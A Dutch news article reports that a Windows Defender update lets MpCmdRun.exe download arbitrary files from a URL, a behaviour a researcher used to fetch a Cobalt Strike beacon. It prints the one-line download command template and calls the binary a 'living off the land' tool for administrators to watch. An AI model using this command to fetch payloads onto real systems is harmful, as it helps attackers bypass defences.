nieuws

Windows Defender verandert in een gevaarlijke app voor beheerders

Windows Defender verandert in een gevaarlijke app voor beheerders

Windows Defender in Windows 10 is de eerste verdedigingslinie in geval van malwareaanvallen en het doet het ook behoorlijk goed.

In een van zijn nieuwe updates kreeg de machtige antivirus echter een nieuwe DownloadFile-opdracht, waarmee iedereen elk bestand van een URL naar een bepaald pad op uw computer kan downloaden.

We kunnen dit een exploit noemen, omdat het ook kan worden gebruikt om zelfs malware te downloaden, iets dat werd ontdekt door beveiligingsonderzoeker Mohammad Askar die zijn bevindingen op Twitter plaatste.

Hoe kan Windows Defender worden gebruikt om malware te downloaden?

Het is heel eenvoudig om het Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) te gebruiken om elk bestand van een externe bron naar uw computer te downloaden.

MpCmdRun.exe -DownloadFile -url [url] -pad [pad_naar_save_file]

In zijn poging kon Askar Cobalt Strike beacon downloaden, een bekende aanvaller-tool met behulp van deze opdrachtregel.

Het nieuwe commando is opgenomen in versie 4.18.2007.8-0 en hoger, wat een redelijk goede starttijd biedt voor aanvallers.

Kortom, deze functie verandert Windows Defender in een LOLBIN (living off the line binaries), een onschadelijk systeembestand dat voor kwaadaardige doeleinden kan worden gebruikt.

Gelukkig, nadat u het schadelijke bestand hebt gedownload, wordt het gedetecteerd door dezelfde Windows Defender of door een andere antivirussoftware, indien aanwezig.

Van een betrouwbare beveiligingssoftware veranderde Windows Defender in een andere mogelijke bedreiging die nauwlettend moet worden gevolgd door beheerders en beveiligingsexperts.

Als u suggesties of opmerkingen heeft, laat deze dan hieronder achter in het gedeelte Opmerkingen.

Microsoft's Windows Store nu met 1,7 miljoen dagelijkse downloads
Nieuwe statistieken laten zien dat de Windows Store in oktober een mijlpaal van 1,7 miljoen dagelijkse downloads heeft bereikt, wat een stijging is va...
Top 10 nieuwe functies voor bedrijven in Windows 8.1
De Windows 8.1-update van Microsoft wordt geleverd met belangrijke functies voor zakelijke en zakelijke gebruikers. We hebben een top 9 geselecteerd d...
Nokia 2520 versus iPad Air Video Advertising
Dit is geen strijd om specificaties, maar eerder om Nokia's kijk op de iPad Air met hun nieuwste advertenties. Dit is dezelfde reclamefilosofie die Mi...